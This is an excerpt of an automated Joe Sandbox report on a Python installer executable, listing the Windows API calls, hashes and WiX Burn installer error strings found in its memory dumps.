                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseSleep
                                                                                                                                  • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                                  • API String ID: 2834455192-2673269691
                                                                                                                                  • Opcode ID: 46067bea0c6fdb322197ba37ace37229310153307ffeee9c53d0bd53759ecebc
                                                                                                                                  • Instruction ID: f6b9424e0fae6c8e12bd810e4fc522ba0ed86c7b9ea56ea96a05c4c7b5b2834e
                                                                                                                                  • Opcode Fuzzy Hash: 46067bea0c6fdb322197ba37ace37229310153307ffeee9c53d0bd53759ecebc
                                                                                                                                  • Instruction Fuzzy Hash: 0361E271A00215AEDF219F65CC46F2B7FA9EF90344B14457BF900DB240E778ED928BA9
                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 004B8D18
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B8858
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B886A
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B887C
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B888E
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B88A0
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B88B2
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B88C4
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B88D6
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B88E8
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B88FA
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B890C
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B891E
                                                                                                                                    • Part of subcall function 004B883B: _free.LIBCMT ref: 004B8930
                                                                                                                                  • _free.LIBCMT ref: 004B8D0D
                                                                                                                                    • Part of subcall function 004B604F: HeapFree.KERNEL32(00000000,00000000,?,004B89CC,?,00000000,?,00000000,?,004B89F3,?,00000007,?,?,004B8E6D,?), ref: 004B6065
                                                                                                                                    • Part of subcall function 004B604F: GetLastError.KERNEL32(?,?,004B89CC,?,00000000,?,00000000,?,004B89F3,?,00000007,?,?,004B8E6D,?,?), ref: 004B6077
                                                                                                                                  • _free.LIBCMT ref: 004B8D2F
                                                                                                                                  • _free.LIBCMT ref: 004B8D44
                                                                                                                                  • _free.LIBCMT ref: 004B8D4F
                                                                                                                                  • _free.LIBCMT ref: 004B8D71
                                                                                                                                  • _free.LIBCMT ref: 004B8D84
                                                                                                                                  • _free.LIBCMT ref: 004B8D92
                                                                                                                                  • _free.LIBCMT ref: 004B8D9D
                                                                                                                                  • _free.LIBCMT ref: 004B8DD5
                                                                                                                                  • _free.LIBCMT ref: 004B8DDC
                                                                                                                                  • _free.LIBCMT ref: 004B8DF9
                                                                                                                                  • _free.LIBCMT ref: 004B8E11
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  • Opcode ID: 4fe037568c3d8eca90c2ca9ff18c633a5ec37242d8b08e00175b5e73516f8d8c
                                                                                                                                  • Instruction ID: 0e8aa9fef6bfce4b1a56b839f81e1ad04a23876d869d9a75ffbf34a67e4a3f8b
                                                                                                                                  • Opcode Fuzzy Hash: 4fe037568c3d8eca90c2ca9ff18c633a5ec37242d8b08e00175b5e73516f8d8c
                                                                                                                                  • Instruction Fuzzy Hash: 1E311A716002059FEB31AA7AD845BD773EDAF50714F15481FE458D6292DF3DAC80CA38
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,00707063,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00492D70
                                                                                                                                  Strings
                                                                                                                                  • wininet.dll, xrefs: 00492FBD
                                                                                                                                  • Failed to check for remaining dependents during planning., xrefs: 00492F16
                                                                                                                                  • crypt32.dll, xrefs: 00492DBB, 00492EB5, 00492FAA, 0049301F
                                                                                                                                  • Failed to create the string dictionary., xrefs: 00492DA9
                                                                                                                                  • Failed to add dependent bundle provider key to ignore dependents., xrefs: 00492EDA
                                                                                                                                  • Failed to allocate registration action., xrefs: 00492DD9
                                                                                                                                  • Failed to add dependents ignored from command-line., xrefs: 00492E25
                                                                                                                                  • Failed to add registration action for self dependent., xrefs: 0049303D
                                                                                                                                  • Failed to add self-dependent to ignore dependents., xrefs: 00492DF4
                                                                                                                                  • Failed to add registration action for dependent related bundle., xrefs: 00493072
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareString
                                                                                                                                  • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
                                                                                                                                  • API String ID: 1825529933-1705955799
                                                                                                                                  • Opcode ID: 43814cbd6eee1f3b5bc5a8bfff4d10a1f6ad99ca0aa097d7a6c2a182a7e7f699
                                                                                                                                  • Instruction ID: 0b6336266a01ab3e3715c33c92bcc3875c510fa15a49d7c3b766abdd2f43db84
                                                                                                                                  • Opcode Fuzzy Hash: 43814cbd6eee1f3b5bc5a8bfff4d10a1f6ad99ca0aa097d7a6c2a182a7e7f699
                                                                                                                                  • Instruction Fuzzy Hash: 73B18870A00226FFCF259F14CA85AAA7BB5BF15701F00817BF804AA255D7B8DA50DB99
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0049F894
                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 0049F977
                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000027), ref: 0049F998
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?), ref: 0049FA41
                                                                                                                                  Strings
                                                                                                                                  • Failed to create bundle update guid., xrefs: 0049F984
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\engineforapplication.cpp, xrefs: 0049F9AD
                                                                                                                                  • Failed to set update bundle., xrefs: 0049FA1B
                                                                                                                                  • Failed to recreate command-line for update bundle., xrefs: 0049F95F
                                                                                                                                  • Failed to default local update source, xrefs: 0049F904
                                                                                                                                  • Failed to convert bundle update guid into string., xrefs: 0049F9B7
                                                                                                                                  • update\%ls, xrefs: 0049F8F0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CreateEnterFromLeaveStringUuid
                                                                                                                                  • String ID: Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$c:\agent\_work\138\s\src\burn\engine\engineforapplication.cpp$update\%ls
                                                                                                                                  • API String ID: 171215650-4014518301
                                                                                                                                  • Opcode ID: 30b6d93092d20059e45ff965941cdb9a9104e90758877beb63aca8517bb1e53b
                                                                                                                                  • Instruction ID: b3ff615e6d6e73dd9f200082ee0c5e1816937d44a17a0021fe5e319737f558ec
                                                                                                                                  • Opcode Fuzzy Hash: 30b6d93092d20059e45ff965941cdb9a9104e90758877beb63aca8517bb1e53b
                                                                                                                                  • Instruction Fuzzy Hash: 8251BC71A00219EBCF219FA5C845FAE7BB4EF08314F24417BF808EB251D7789815CB99
                                                                                                                                  APIs
                                                                                                                                  • IsWindow.USER32(?), ref: 00484CE4
                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00484CF5
                                                                                                                                  Strings
                                                                                                                                  • Failed to open log., xrefs: 00484B98
                                                                                                                                  • Failed to set action variables., xrefs: 00484C44
                                                                                                                                  • Failed to set layout directory variable to value provided from command-line., xrefs: 00484C86
                                                                                                                                  • Failed to create the message window., xrefs: 00484C18
                                                                                                                                  • Failed while running , xrefs: 00484CAA
                                                                                                                                  • Failed to check global conditions, xrefs: 00484BC9
                                                                                                                                  • WixBundleLayoutDirectory, xrefs: 00484C75
                                                                                                                                  • Failed to set registration variables., xrefs: 00484C5E
                                                                                                                                  • Failed to query registration., xrefs: 00484C2E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePostWindow
                                                                                                                                  • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                  • API String ID: 3618638489-3051724725
                                                                                                                                  • Opcode ID: 91d69105c34dc480e138640eb8ef0d452dd41095db2c62cb4c191f30d345755e
                                                                                                                                  • Instruction ID: 48a54abc28a741877fbedecb487212b5a0f4ac0ce4183482093cab9cf6eec178
                                                                                                                                  • Opcode Fuzzy Hash: 91d69105c34dc480e138640eb8ef0d452dd41095db2c62cb4c191f30d345755e
                                                                                                                                  • Instruction Fuzzy Hash: AC41F171601617BBDB56BA60CC42FBEBA5CFB40754F12062BF901A2140E778ED5097D9
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,0049A7BE,?,00000000,00000000,00000000,?), ref: 0049969F
                                                                                                                                  • GetLastError.KERNEL32(?,0049A7BE,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004996AD
                                                                                                                                    • Part of subcall function 004C454C: Sleep.KERNEL32(?,00000000,8NH,004985D8,004CB4D8,004CB4F0,00000001,00000003,000007D0,004CB508,?,crypt32.dll,clbcatq.dll,?,msasn1.dll,comres.dll), ref: 004C4563
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000001,00000003,000007D0,00000000,00000000), ref: 0049978B
                                                                                                                                  Strings
                                                                                                                                  • Failed to copy %ls to %ls, xrefs: 00499779
                                                                                                                                  • Failed to verify container hash: %ls, xrefs: 0049970E
                                                                                                                                  • Copying, xrefs: 0049972A, 00499735
                                                                                                                                  • %ls container from working path '%ls' to path '%ls', xrefs: 00499736
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cache.cpp, xrefs: 004996D1
                                                                                                                                  • Moving, xrefs: 00499721
                                                                                                                                  • Failed to open container in working path: %ls, xrefs: 004996DC
                                                                                                                                  • Failed to move %ls to %ls, xrefs: 00499763
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                  • String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$c:\agent\_work\138\s\src\burn\engine\cache.cpp
                                                                                                                                  • API String ID: 1275171361-282647985
                                                                                                                                  • Opcode ID: 58e52054c6ecec6526f14b75436539498b08f344f26ab4e51abe8416dfa784f8
                                                                                                                                  • Instruction ID: 346b769da413a043030ab9c6e6e8ef326f3b9ad27d4bed8072a5511b212ec2cd
                                                                                                                                  • Opcode Fuzzy Hash: 58e52054c6ecec6526f14b75436539498b08f344f26ab4e51abe8416dfa784f8
                                                                                                                                  • Instruction Fuzzy Hash: 7E213632A40624B7DA226E5E4C46F6F291CDF91B24F11006FFE017A3C1E669DC1086ED
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00487068
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00487274
                                                                                                                                  Strings
                                                                                                                                  • Failed to read variable value as number., xrefs: 0048722E
                                                                                                                                  • Failed to set variable value., xrefs: 00487227
                                                                                                                                  • Failed to read variable included flag., xrefs: 00487264
                                                                                                                                  • Failed to read variable value type., xrefs: 00487256
                                                                                                                                  • Failed to read variable name., xrefs: 0048725D
                                                                                                                                  • Unsupported variable type., xrefs: 0048723A
                                                                                                                                  • Failed to read variable value as string., xrefs: 00487241
                                                                                                                                  • Failed to read variable literal flag., xrefs: 0048724F
                                                                                                                                  • Failed to set variable., xrefs: 00487248
                                                                                                                                  • Failed to read variable count., xrefs: 00487088
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
                                                                                                                                  • API String ID: 3168844106-528957463
                                                                                                                                  • Opcode ID: 455e7cea02f2d19b1fc53493f37e969092e76a41cc10ea77cec45c1b65b86caa
                                                                                                                                  • Instruction ID: 9565fbda4ba0c642d614524bd295774d63e6b32ea78d8489bc7fad708051fb82
                                                                                                                                  • Opcode Fuzzy Hash: 455e7cea02f2d19b1fc53493f37e969092e76a41cc10ea77cec45c1b65b86caa
                                                                                                                                  • Instruction Fuzzy Hash: D371A231C0421ABBCF11EEA5CC55FAEBBB9EF04714F20456BF900A6250D738DE019BA9
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 004C4997
                                                                                                                                  • GetLastError.KERNEL32 ref: 004C49AD
                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 004C49FD
                                                                                                                                  • GetLastError.KERNEL32 ref: 004C4A07
                                                                                                                                  • SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 004C4A5B
                                                                                                                                  • GetLastError.KERNEL32 ref: 004C4A66
                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 004C4B55
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004C4BC8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\fileutil.cpp
                                                                                                                                  • API String ID: 3286166115-3168567549
                                                                                                                                  • Opcode ID: cf24f91cc1453c7c14cf60f4e57daca37975989a93fe91ef92c4b626aad3c2e8
                                                                                                                                  • Instruction ID: cbad1a294b3278ee1155ac1ab82070b249956252e4b6ffe42592906a2fc73d68
                                                                                                                                  • Opcode Fuzzy Hash: cf24f91cc1453c7c14cf60f4e57daca37975989a93fe91ef92c4b626aad3c2e8
                                                                                                                                  • Instruction Fuzzy Hash: C8813839A40225EBDB618E658E61F6F7698EB80724F11412FFC54EB380E67CDD00879D
                                                                                                                                  APIs
                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 004831E7
                                                                                                                                  • GetLastError.KERNEL32 ref: 004831ED
                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 00483247
                                                                                                                                  • GetLastError.KERNEL32 ref: 0048324D
                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00483301
                                                                                                                                  • GetLastError.KERNEL32 ref: 0048330B
                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00483361
                                                                                                                                  • GetLastError.KERNEL32 ref: 0048336B
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\pathutil.cpp, xrefs: 00483211
                                                                                                                                  • @, xrefs: 004831C1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                                                                                                  • String ID: @$c:\agent\_work\138\s\src\libs\dutil\pathutil.cpp
                                                                                                                                  • API String ID: 1547313835-3477864740
                                                                                                                                  • Opcode ID: f3833d469fadf7545ab5572ac3884fd73d9f636ef07755a8b6b76d4f21cd589e
                                                                                                                                  • Instruction ID: 93bc4cecf704a2454fda72b052a9ca7a443d8a0510e5df505869af9f5a4cec22
                                                                                                                                  • Opcode Fuzzy Hash: f3833d469fadf7545ab5572ac3884fd73d9f636ef07755a8b6b76d4f21cd589e
                                                                                                                                  • Instruction Fuzzy Hash: 9561D777D00229ABDB21BED58C45B9FBA64AB00F56F114967ED00BB240D779DF018BD8
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00000001,000000FF,?,00000001,5TH,00000000,?,?,WixBundleUILevel,version.dll,?,00000001), ref: 0048CCCA
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\payload.cpp, xrefs: 0048CDCB
                                                                                                                                  • Failed to extract file., xrefs: 0048CD95
                                                                                                                                  • Failed to concat file paths., xrefs: 0048CDAA
                                                                                                                                  • Failed to find embedded payload: %ls, xrefs: 0048CCF6
                                                                                                                                  • Failed to get directory portion of local file path, xrefs: 0048CDA3
                                                                                                                                  • Failed to ensure directory exists, xrefs: 0048CD9C
                                                                                                                                  • Failed to get next stream., xrefs: 0048CDB1
                                                                                                                                  • 5TH, xrefs: 0048CC7B
                                                                                                                                  • Payload was not found in container: %ls, xrefs: 0048CDD7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareString
                                                                                                                                  • String ID: 5TH$Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$c:\agent\_work\138\s\src\burn\engine\payload.cpp
                                                                                                                                  • API String ID: 1825529933-3838090308
                                                                                                                                  • Opcode ID: c7a293941bf59be5f6cccc666eba1f9867dd7509e6564a766bbb1321e8f63d80
                                                                                                                                  • Instruction ID: 4ccb867d28d5af1c9d95bcd99590aef44f1be7e454854e592aed9e1af29f3191
                                                                                                                                  • Opcode Fuzzy Hash: c7a293941bf59be5f6cccc666eba1f9867dd7509e6564a766bbb1321e8f63d80
                                                                                                                                  • Instruction Fuzzy Hash: F141DF31900215EBCF25BF95DCC1AAEBBA5EF40710F10897BEC05AB351C6789E41DBA9
                                                                                                                                  APIs
                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 004860C5
                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 004860D9
                                                                                                                                  • GetLastError.KERNEL32 ref: 004860EB
                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 0048613F
                                                                                                                                  • GetLastError.KERNEL32 ref: 00486149
                                                                                                                                  Strings
                                                                                                                                  • Failed to allocate the buffer for the Date., xrefs: 00486127
                                                                                                                                  • Failed to get the required buffer length for the Date., xrefs: 00486110
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\variable.cpp, xrefs: 00486106, 00486164
                                                                                                                                  • Failed to set variant value., xrefs: 00486187
                                                                                                                                  • Failed to get the Date., xrefs: 0048616E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                  • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$c:\agent\_work\138\s\src\burn\engine\variable.cpp
                                                                                                                                  • API String ID: 2700948981-3071540250
                                                                                                                                  • Opcode ID: b769823479fc479a6f2c30ff2fe5ff4c22032f42094ba61dd593ebdf03f95523
                                                                                                                                  • Instruction ID: 66811d56ae4385bb91a218abba7463c2f954b7314c0bcf240cb4aaa3ae48f544
                                                                                                                                  • Opcode Fuzzy Hash: b769823479fc479a6f2c30ff2fe5ff4c22032f42094ba61dd593ebdf03f95523
                                                                                                                                  • Instruction Fuzzy Hash: D7310B36E402257BD751BBA5CC46FAFBA64AB04710F12053BFA04F7282DA689D0147ED
                                                                                                                                  APIs
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00485506,?,?), ref: 0049EA02
                                                                                                                                  • GetLastError.KERNEL32(?,00485506,?,?), ref: 0049EA0F
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0049E720,?,00000000,00000000), ref: 0049EA68
                                                                                                                                  • GetLastError.KERNEL32(?,00485506,?,?), ref: 0049EA75
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00485506,?,?), ref: 0049EAB0
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00485506,?,?), ref: 0049EACF
                                                                                                                                  • CloseHandle.KERNEL32(?,?,00485506,?,?), ref: 0049EADC
                                                                                                                                  Strings
                                                                                                                                  • Failed to create the UI thread., xrefs: 0049EAA0
                                                                                                                                  • Failed to create initialization event., xrefs: 0049EA3A
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\uithread.cpp, xrefs: 0049EA30, 0049EA96
                                                                                                                                  Memory Dump Source
